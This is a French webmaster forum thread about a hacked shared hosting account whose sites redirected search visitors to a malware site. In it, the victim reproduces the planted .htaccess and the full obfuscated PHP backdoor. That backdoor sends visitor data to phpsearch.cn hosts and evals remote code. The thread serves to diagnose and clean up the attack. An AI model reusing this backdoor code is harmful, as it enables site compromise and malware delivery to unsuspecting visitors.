Discussion :

[numismatique]

Bonjour,

Il y a quelques jours j'ai effectué une recherche sur google pour voir si mon site web se trouvait dans les résultats pour un mot clé donné.
Et en cliquant sur mon site parmi ces résultats, j'ai été redirigé vers ce site web : lvhook . biz (ne pas aller sur ce site, il contient un malware).
J'ai pensé sur le coup que j'avais mal cliqué, donc j'ai fermé la page, relancé la même recherche sur google et re cliqué sur mon site sans cette fois ci être redirigé sur ce site pirate!
Quelques jours plus tard sur un autre ordinateur, j'ai effectué une autre recherche sur google et le problème est réapparu.
Depuis, j'ai rencontré de nouveau ce problème pour plusieurs de mes sites (même ceux ne contenant qu'une page, car n'étant pas encore développés).
J'écarte l'hypothèse que ces redirections sont dûes à un malware présent sur mon ordinateur car j'ai rencontré le même problème sur différents PC.

Je précise que tous mes sites sont hébergés chez le même prestataire (hostforweb).
Je suppose donc qu'un de mes sites a été attaqué et qu'un petit malin a réussi à introduire du code ou modifier quelques fichiers afin de réaliser des redirections discrètes (car périodiques et présentes qu'à partir des recherches de google).

Je me pose les questions suivantes :
Quels types de fichiers ont pu être modifiés pour générer ces redirections (périodiques) ? htaccess ou autres fichiers ?
Un hébergeur est il capable de détecter ce type de redirection est de savoir d'où elles viennent ?
Avez vous une idée sur la démarche à suivre pour supprimer le problème (j'ai déjà commencé à supprimer quelques brèches dans mon code, mais tant que le loup sera dans la bergerie, mon problème perdurera...)

Je vous remercie d'avance pour vos suggestions et j'apporterai d'autres précisions si je n'ai pas été assez précis.
Eric

[pi-2r]

Bonsoir,
quel est la nature de ton site, et quelle est son adresse ?

l'attaque en question, n'a à mon avis rien avoir avec le pc que tu utilises pour voir ton site

[numismatique]

Bonsoir,

J'ai 2 sites développés et une vingtaine d'autres avec une page de parking en attendant un développement futur.

un qui traite de la numismatique
un sur les chambres d'hôtes.

C'est certain que dans le site numismatique il y a des failles dans les formulaires, mais je vais tenter d'y rémédier rapidement.

Ce que je ne comprends pas c'est que d'autres de mes sites, comme qui ne contiennent qu'une seule page font la même chose! Alors que la seule page du site est on ne peut plus simple et ne contient pas de code malicieux.

C'est donc sans doute à la racine de mon hébergement que le "pirate" a dû placer quelque chose..
Mais je ne vois pas quoi car les .htaccess à la racine sont corrects et les dates de modifications des différents fichiers correspondent aux dates auxquelles je les ai modifiés.

Quel type de fichier pensez vous qu'il est susceptible de manipuler pour générer ces redirections ? (qui n'ont pas lieu à chaque fois).
Ce n'est en tout cas pas un script dans la page d'accueil.

Pensez vous qu'il est possible qu'il y ait un problème du coté de l'hébergeur ou des DNS ? (j'ai vérifié les DNS et ils étaient corrects au moment ou j'ai vérifié)

Je vous remercie vivement de l'attention que vous portez à mon soucis!
Bonne soirée

Bonsoir,
quel est la nature de ton site, et quelle est son adresse ?

l'attaque en question, n'a à mon avis rien avoir avec le pc que tu utilises pour voir ton site

[numismatique]

Bonjour,
J'ai enfin trouvé comment le pirate s'y prenait.
Il a trouvé une faille dans mes pages d'upload de fichiers.
Il plaçait dans ces répertoires (qui étaient en 777) un fichier php et fichier htaccess.
Voici pour info le contenu de ces fichiers :

.htacess :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
Options -MultiViews
ErrorDocument 404 //admin/groups/199577.php

199577.php (le nom de ce fichier varie d'un répertoire à l'autre) :

Code php :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<? error_reporting(0);
$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);
$f=base64_decode("cGhwc2VhcmNoLmNu");
if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="e958c78e80ad17e29e8684bc6f305953") $f=$_REQUEST["id"];
if((include(base64_decode("aHR0cDovL2FkczMu").$f.$z)));
else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);
else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
$o=curl_exec($cu);
curl_close($cu);
eval($o);
};
die();
 ?>

En gros lorsqu'un visiteur venait sur une page de mon site contenant un fichier introuvable, il risquait de se faire rediriger sur :
http://ads3.phpsearch.cn
http://7.phpsearch.cn
http://71.phpsearch.cn

Ensuite ces sites redirigeaient immédiatement le visiteur vers le site voulu, en l'occurence
http://lvhook.biz/ qui amenait le visiteur à télécharger un malware.

J'ai supprimer tous ces fichiers, puis les failles les plus critiques sur mon site et changé les droits des répertoires.

J'ai vu en faisant des recherches sur google que de nombreux autres webmaster avaient subi le même piratage.

A+

[Thes32]

C'est quand même louche, et comment a t'il su pour les autres autres sites ?

Il a trouvé une faille dans mes pages d'upload de fichiers.
Il plaçait dans ces répertoires (qui étaient en 777) un fichier php et fichier htaccess.

[numismatique]

Tous mes noms de domaine pointent vers des sous répertoires d'un même hébergement.
Donc je suppose que les fichiers htaccess qu'il a disposé dans certains répertoires (une dizaine) générait une redirection dès lors qu'une des pages demandées par un visiteur présentait un fichier absent.
Mais bon je suis loin d'être expert en informatique... Donc mes suppositions ne sont que des suppositions...
Je viens d'acheter ce livre "Sécurité PHP 5 et MySQL" aux éditions Eyrolles en espérant combler toutes les failles béantes de mes sites et comprendre par la même occasion comment son petit stratagème fonctionnait.

C'est quand même louche, et comment a t'il su pour les autres autres sites ?